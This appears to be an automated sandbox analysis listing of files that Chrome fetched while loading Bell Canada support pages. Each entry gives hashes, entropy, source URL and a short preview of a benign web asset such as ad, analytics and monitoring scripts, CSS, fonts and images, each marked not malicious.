                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4829), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):4829
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.81899327826036
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUTmIf9:1DY0hf1bT47OIqWb1mRf9
                                                                                                                                                                                                                                                                                                                                      MD5:F982CFEF1F2DB1B49F1B4C76162F2185
                                                                                                                                                                                                                                                                                                                                      SHA1:9CAF4EC0E488525B87A91F182398D2F199474A38
                                                                                                                                                                                                                                                                                                                                      SHA-256:DC38D18E434EEA07E392B1730D44D4F0789985F652E91C4FAD08E54919CEE1F3
                                                                                                                                                                                                                                                                                                                                      SHA-512:82274CBB9DB435D5136D010E9EFC120E97157BB28673411F62FC4A57810438681921F50958CBA8F30D24327C0D1B4D4FA1C6278E72DA272018C243D2DEBA353A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/953414520/?random=1730380379227&cv=11&fst=1730380379227&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fsupport.bell.ca%2FBilling-and-Accounts%2Fmanage_your_bell_services_on_the_go&hn=www.googleadservices.com&frm=0&tiba=Manage%20your%20Bell%20services%20on%20the%20go&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                                                                                                                                                                                      Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):7457
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.762490346864117
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:+rPzVdhy+Y76N66iSt0ih4ipixOi+4ioiUiVi+4iPaP:uE+Y76Nn6ih4ipigi+4ioiUiVi+4iY
                                                                                                                                                                                                                                                                                                                                      MD5:15F7E4A945F98A8CD5DA0CC38E36C138
                                                                                                                                                                                                                                                                                                                                      SHA1:2616367624D8D30E3AAB545327F07E66345AE330
                                                                                                                                                                                                                                                                                                                                      SHA-256:CEF697A926119ED2E9328E84E88E3A42B1987A64256C55066B37DC3F36883515
                                                                                                                                                                                                                                                                                                                                      SHA-512:C1A02E40650BE6BDF8C5FF3606D2219A3528AE2A5A3F9B1052C2A376748266879B667979F11E291A4C4BCAF80AD4A9E125281C69B3EA69EDF0CFAA80440B9164
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/MYB/web/DCX/js/ieDeprecatedBrowserJS.js?ver=201809301812
                                                                                                                                                                                                                                                                                                                                      Preview:/* Latest update: 2016.June.27 */../* Last updated: 2017.June.15 */../* ieDeprecatedBrowserJS js */....navigator.browserDetails = (function(){.. var ua = navigator.userAgent, tem, M = ua.match(/(opera|chrome|safari|firefox|msie|trident(?=\/))\/?\s*(\d+)/i) || [];.. if(/trident/i.test(M[1])){.. tem = /\brv[ :]+(\d+)/g.exec(ua) || [];.. return {name:"MSIE",version:(tem[1] || "")};.. }.. if(M[1]=== "Chrome"){.. tem = ua.match(/\b(OPR|Edge)\/(\d+)/);.. if(tem != null) {.. return {name:tem[1].replace("OPR", "Opera"),version:tem[2]};.. }.. }.. M = M[2]? [M[1], M[2]]: [navigator.appName, navigator.appVersion, "-?"];.. tem = ua.match(/version\/(\d+)/i);.. if(tem != null) {.. M.splice(1, 1, tem[1]);.. }.. return {name:M[0],version:M[1]};..}());....// Function triggered when user closes the Deprecated Browser message..function IsBrowserMessageClosedByUser() {.. //alert('IsBrowserMessageClosedByUser');.. setC
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1629)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):341434
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.610140131068381
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:mrl40frXFUOOkXyh4S/J8ME9ifUUIcNUzNcCs+SOHw2aN:mre6/OkXyhR9E9+Uj26BsKo
                                                                                                                                                                                                                                                                                                                                      MD5:AE7E05FE0E966FA7253CD6AE563F5BAE
                                                                                                                                                                                                                                                                                                                                      SHA1:EE45D718FC726C997E339A54F0B06DDEC096F024
                                                                                                                                                                                                                                                                                                                                      SHA-256:949B63051BA550CABCF8541D921703F31FEAEF9506D7D45096C43C24A5C9B3E9
                                                                                                                                                                                                                                                                                                                                      SHA-512:56B33ED92FC98F7060DD175B62584D657E7CFC275E034F0A99C9E4680EFB782913CFEFCC81B1211DD6CD433B77F95A57E7C9CF7E70DE25BCCF29C2AE8E9B99F5
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell.bell.ca/ruxitagentjs_ICA7NQVfghqrux_10299241001084140.js
                                                                                                                                                                                                                                                                                                                                      Preview:/*. Copyright and licenses see https://www.dynatrace.com/company/trust-center/customers/reports/ */.(function(){function Ka(){document.cookie="".concat("__dTCookie","=").concat("1",";SameSite=Lax");var Oa=document.cookie.includes("__dTCookie");document.cookie="".concat("__dTCookie","=").concat("1","; expires=Thu, 01-Jan-1970 00:00:01 GMT");return Oa}function fb(){return void 0===cb.dialogArguments?navigator.cookieEnabled||Ka():Ka()}function mb(){var Oa;if(fb()){var Pa=cb.dT_,Wa=null===Pa||void 0===Pa?void 0:Pa.platformPrefix;if(!Pa||Wa){var Ra=null===Pa||void 0===Pa?void 0:Pa.minAgentVersion;Ra&&."10299241001084140"<Ra+""?window.console.log("[CookiePrefix/initConfig] Min agent version detected, and javascript agent is older - the javascript agent will not be initialized!"):(Ra=(Oa={},Oa.cfg="#CONFIGSTRING#|auto=#AUTO#|domain=#DOMAIN#|rid=RID_#REQUEST_ID#|rpid=#RESPONSE_ID#|app=#APP#",Oa.iCE=fb,Oa.platformCookieOffset=null===Pa||void 0===Pa?void 0:Pa.platformCookieOffset,Oa),Wa&&(Ra.pla
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):28
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.307354922057605
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:K+NCkuSKaY:/uS5Y
                                                                                                                                                                                                                                                                                                                                      MD5:9C89F0A80E502021280588AAF3229BBF
                                                                                                                                                                                                                                                                                                                                      SHA1:2A43BDD4B7CE191030A539193371624B3ABD8C51
                                                                                                                                                                                                                                                                                                                                      SHA-256:C199BD50C672BDC1DD6B5FB18823EFD3C99BC8D90701C28D7DAA311EBEB96217
                                                                                                                                                                                                                                                                                                                                      SHA-512:FEAF00936C479C032BC1AD1AB672F82FC2A68E2BC53808F06E67C6ADC34BD63DCFED5606CD8ECBD981A44B3FA4C1D90334FBBD01BCBA6B65224D600290E3FA3A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwnqq-8MLIIpwxIFDWdns_4SBQ3h5tTW?alt=proto
                                                                                                                                                                                                                                                                                                                                      Preview:ChIKBw1nZ7P+GgAKBw3h5tTWGgA=
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):5430
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.507783608405071
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:YhHizFggggggggggggggqDbbWKirckevvvvvvvvvvvvvvvvvvvvvvvvvvvvvvzg4:mHizibbWKigk
                                                                                                                                                                                                                                                                                                                                      MD5:71E639807DD6F7BD6D9382624B837574
                                                                                                                                                                                                                                                                                                                                      SHA1:2A6AFCB240F07F37794E1D9C34DBE5D673C738B4
                                                                                                                                                                                                                                                                                                                                      SHA-256:5C82B38E75516678C187C1CB7003482CFFD310BF384207EA539CED9AF87D6D92
                                                                                                                                                                                                                                                                                                                                      SHA-512:C9193804E6587F4380044A2024854BCD8E71A937BBAAA96CDB493CDB0D1911C9DB04974FA9EDC1C5A2E04A659A007A9FDC5DCA3B13D98EC4B70F4A0D92EF8616
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/favicon.ico
                                                                                                                                                                                                                                                                                                                                      Preview:............ .h...&... .... .........(....... ..... ..........................h...h...h...h...h...h...h...h...h...h...h...h...h...h...h...h...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...j...j...j...j...j...j...j...j...j...j...j...j...j...j...j...j...l...l...l...l...l...l...l...l...r"..o...l...l...l...l...l...l...n......................w*....................z.........n...q!.........q!...N..............z...t%..y.......|.........q!..s%.........s%..t%..............................~.........s%..v)............................`..}....................v)..x,...................z/.............x................x,..z0..........z0.........z0..z0..z0..z0..z0................z0..}4...................}4..}4..}4..}4..}4................}4...8...m.........f...8...8...8...8...8...8......a......g...8...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...@...@...@...@...@...@...
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (543)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):690
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.414421274239957
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:jvgeTrAApBSECpct/BeTrAApBSECcLKvo31FXiTGcKX3SPwmLAfHTN5drbHqMTkY:zlCpct/BMlCtvo3DjSBLAfTrdrbLTkuT
                                                                                                                                                                                                                                                                                                                                      MD5:DC27892943C0BD9A7E5F4BA4A7E4C31F
                                                                                                                                                                                                                                                                                                                                      SHA1:9F3CBABD04A0938296BF7129B7F2A85C86EC201A
                                                                                                                                                                                                                                                                                                                                      SHA-256:D380077A0DE0C31E8134C6D935263E870E11AB380EE07C8661F8A7BD34319C3B
                                                                                                                                                                                                                                                                                                                                      SHA-512:134B8198D09CF20C8A6FE86AD96491789F679FCF5CE54720D3434D86251159A9A746EC4504C1B397EE3E87613428D28EE2FCD616DA5FDEE97266598F0E081E7E
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC6732f5ab8e4146b3ae804646fc9078fb-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC6732f5ab8e4146b3ae804646fc9078fb-source.min.js', "var cookie=_satellite.cookie.get(\"OptanonConsent\"),re=/groups=([^&]*)/i,result=\"not available\";if(cookie&&re.test(cookie))result=cookie.match(re)[1];else if(\"undefined\"!=typeof OnetrustActiveGroups){var values=OnetrustActiveGroups;result=(values=values.split(\",\")).filter((e=>\"\"!==e));for(var i=0;i<result.length;i++)result[i]+=\":1\";result=result.join(\",\")}window.s_oDPF=result;");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (10205), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):10205
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.3025574672083104
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:8/v+J6fD9oUCNSNDhDeDzcOOnZKhGzWZRjRPRgowJwDEA:tpNSNDhDeDzcydT
                                                                                                                                                                                                                                                                                                                                      MD5:549B71759D862483002C65F18EA757CF
                                                                                                                                                                                                                                                                                                                                      SHA1:FB078917FC2C1C6428FE66CFE3C52E7BF2840463
                                                                                                                                                                                                                                                                                                                                      SHA-256:7E8C6178F007F0A6F06F1D12BD3D3B74D01F7290B0BA4B94FD63ECCBE9C425D4
                                                                                                                                                                                                                                                                                                                                      SHA-512:C01D697937A1FE0719875AB88151B08C84C302420C2B749ACDC4CAE5477C739362F2631E7EFBFA6A538F7F41D261B715318309DF3C0F5429C300C7C285954CE9
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:(function(){(function(bk){"use strict";var K=Function.prototype.call.bind(Function.prototype.toString);var o=[];var x=[];var l={toString:function(){var a=o.lastIndexOf(this);if(a>=0){return x[a]}return K(this)}};l.toString.prototype=void 0;o=[l.toString];x=[K(Function.prototype.toString)];function z(a,c){if(typeof c!=="function"){return}try{var b=l.toString.call(c);x.push(b);o.push(a);if(Function.prototype.toString!==l.toString){Function.prototype.toString=l.toString}}catch(a){}}var C="ZT4tcOwEFkVEzfiT1T6u";var bh=Object.call.bind(Object.bind,Object.call);var bg=bh(Object.call);var bj=Array.prototype.push;var bi=Array.prototype.indexOf;var Y=Array.prototype.concat;var i=Array.prototype.slice;function A(){return{__callbacks:[],notify:function(g){var h;var d=bg(i,this.__callbacks);var a=d.length;for(var b=a-1;b>=0;--b){try{var e=d[b];if(e!=null){var c=e(g,h);if(c!=null){h=c}}}catch(a){}}return h},register:function(a){bg(bj,this.__callbacks,a)},unregister:function(b){var a=bg(bi,this.__ca
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (537), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):715446
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.8683113391236414
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:Ypwmjs0d6quRRzjDYEjNYjs1V81FCSjwmQylSxSkSDjQBzhY6vvo9pKvvI9p68EW:YpwmjsDquRRzjDYEjNYjvJQy1M1aZrqU
                                                                                                                                                                                                                                                                                                                                      MD5:65B78FB4250813B347B8A0AE3D938E0E
                                                                                                                                                                                                                                                                                                                                      SHA1:494948982F362AD2E545870BA4486452DA553231
                                                                                                                                                                                                                                                                                                                                      SHA-256:80C4C1BE4E8ABED3F691F36F71948DFD1BE37C92D14CF35957877F9B47D1D487
                                                                                                                                                                                                                                                                                                                                      SHA-512:D4DEB9BB5B791022EE19F9FA555BA2A6C4A9A865A317B0EE5B308BBB3B3A2D9940C1B8E87ADF1E6608BF48CF33C48155D3828ADA0CC7B952AE310F6A5882441B
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/media/support/core/css/support-core.css?v=eHwKg0Kjcqr-hNGvkcTcC7eXIxWmCTJ-MNoEIBCTj_o1
                                                                                                                                                                                                                                                                                                                                      Preview:/* Minification failed. Returning unminified contents...(8,5): run-time error CSS1062: Expected semicolon or closing curly-brace, found '-'..(9,5): run-time error CSS1062: Expected semicolon or closing curly-brace, found '-'..(10,5): run-time error CSS1062: Expected semicolon or closing curly-brace, found '-'..(11,5): run-time error CSS1062: Expected semicolon or closing curly-brace, found '-'..(12,5): run-time error CSS1062: Expected semicolon or closing curly-brace, found '-'..(13,5): run-time error CSS1062: Expected semicolon or closing curly-brace, found '-'..(14,5): run-time error CSS1062: Expected semicolon or closing curly-brace, found '-'..(15,5): run-time error CSS1062: Expected semicolon or closing curly-brace, found '-'..(16,5): run-time error CSS1062: Expected semicolon or closing curly-brace, found '-'..(17,5): run-time error CSS1062: Expected semicolon or closing curly-brace, found '-'..(18,5): run-time error CSS1062: Expected semicolon or closing curly-brace, found '-'..
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 28432, version 1.0
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):28432
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.99174337070475
                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:NnY0R0Ka2YyxAdf3kE2KaaE9lJisupXtYdNA05iCSDX2K5z5WE/LyfxgIu0sGg+m:R9R0KAyxa3kEYnSYXeGO5T2KxqgxCgyq
                                                                                                                                                                                                                                                                                                                                      MD5:4ED9EC9E88CA0BEFAA5C7BD33B8328EF
                                                                                                                                                                                                                                                                                                                                      SHA1:F12524D64070458F10436F54D4A8D1E1DE2C2E95
                                                                                                                                                                                                                                                                                                                                      SHA-256:9DC27D70602BAD7848DC91B032938A82ECD50ED2C76404D001609DAE47050FC4
                                                                                                                                                                                                                                                                                                                                      SHA-512:3346B5BCA36A50B8EAEA5C8D0C76722059A142C4457E1149E20A2DB96594C4B4F388CE4360EDA0972B7A350E604104FA20AE6FD0FD285FE85D584BC1F4E584D9
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/media/support/Shared/fonts/support-home-phone-icons.woff2
                                                                                                                                                                                                                                                                                                                                      Preview:wOF2......o...........n.........................?FFTM....`..J.....D..}..F..6.$.... .....^.....%..@6.w....X.3>43PSw.h....%...n..x...J.J.......Qf.p,KG{.<cU.p.4...(..I...%)....|..:.o...g`..>..e..m.W.....f..,IL......b$...^.9..0....=O/ x).^J...<.}...|).......#~B....n5I6...$..NO...B(.!$....(.R,'.J....l`m...w.Y**.9K.{.,........C0...;......G..\.....m...t.{.hgggm.$......VI..%`..)R../goUj.{.e;.tJ.....F....o...t]...O..t._..?~[6....g.Z....T."...s5O~g~.....j&....ig.u{.x...Z..J,..../.......9.HI...Lj5y.......*.p@..QuH.6n....c......e.....=.s.;....BJ....E..;.N.....x..."@R:.|... .GP....e.8g<.sr..6. s6.. . z...'......}.7.C..&.j..R(J.....id..p$.8..g.=..H..m..M...P.y.....k.m.h.!V..C5.1ME.J._........o.U......!.....b.T..B...Y.j .t..(Q)...5L.-2A.K.dM.....z....h.*+.!.........'.M'b......P..c.|7{..eZ8(..5.-.JBU...K...is......$B..!....p....E..h0w..a....p.@....0......c.N..t.q.ct......{../......k./m/k^6.lyy...../....z.u..?cc.........+........$}......G/.6....N..{.`).
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 179x359, components 3
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):12306
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.957752936273148
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:JTbenClUktpq0zTleiKQTy1syfi95/EJcP:JfenClUCKQCpa90A
                                                                                                                                                                                                                                                                                                                                      MD5:5C865DBDBE5489CA99F421A6B973F614
                                                                                                                                                                                                                                                                                                                                      SHA1:7AE0226D959ABE9E5F8D286EEBC3DF13240DE2A5
                                                                                                                                                                                                                                                                                                                                      SHA-256:2931A8B701600DA4EEC98964180AA22F475ABCF44FD9F2D5CE4B11DB2BAA3B38
                                                                                                                                                                                                                                                                                                                                      SHA-512:3F0CB8F833EDD6CC32842136A258756EEA234F81791BA4B95F3EB126B5205FD07FBB48B86387EC0632DD85CD68F14CC320376B8705394B7D4F75810D3393C3C6
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................".."............................................................g...................................................................!1.."2AQBRqs....#45abr.......36CST...Fc.....V...$%D................................................!.1.AQa"b..2Rr............?..j.T.$(.....;m..83.{ps.i....+...~..W..B.Wg..........;.....P.....'..5r....!=4.pm].......Q.evw...\.{+...OM\j...]..Bzj.W(^......W..B.Sg...........;.....P.....'..5r........\j...J...|.p..:.......5F.....T..ER*.T.v...VOwp...W..`..Ak.n.M.Y.)..7nV...%.`G.|y.1..H......8........{.u.B2R!,.}/i.uj$G.O.I......?.z.V......]0.D...*.:..T\..................._?.O..&....A./.....M[.Q..G._?.O..&..d...v..Y.e,q .......p*.Z.X...-.....u.:K..=..uj$..T................R^P.c.]7.r..ut..Q......9?..:5.K9D......=[.3.c.?..o.....V...?R.Q...Q..jO..n.Gd.#.h...[.v.YPzVY*.:...S..E...P.K....p...w./.^n.Tq.O..+..Ch.z.!C.8......F.>.....U&..F.jm%.
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (501)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):993
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.295033064548282
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:E1vXIbtEHvIYWwmqAK/HJ2cNAXzk5vuHM8aJLtMCRWZ4FhQ:E1vXmtEPT6cLAXzk5kaJL+CwYhQ
                                                                                                                                                                                                                                                                                                                                      MD5:DA6D9261142ADA0AD0C8C737604571A4
                                                                                                                                                                                                                                                                                                                                      SHA1:EC006EEE63E9F85D930EF27E67B1BCA62A8AD8AD
                                                                                                                                                                                                                                                                                                                                      SHA-256:16FB10CD2B09718CDC2D143B223E15C71CB8890C9A07F85DA472BAD0C874B99C
                                                                                                                                                                                                                                                                                                                                      SHA-512:8831DE832B5BFC39E36333F5C836B36EEDC5333192DA409181315CB355AD27E09E80E97FA757E958E2BB79FD3B512957A024A7968E88299CF89AE5B68F9B17BA
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.youtube.com/iframe_api
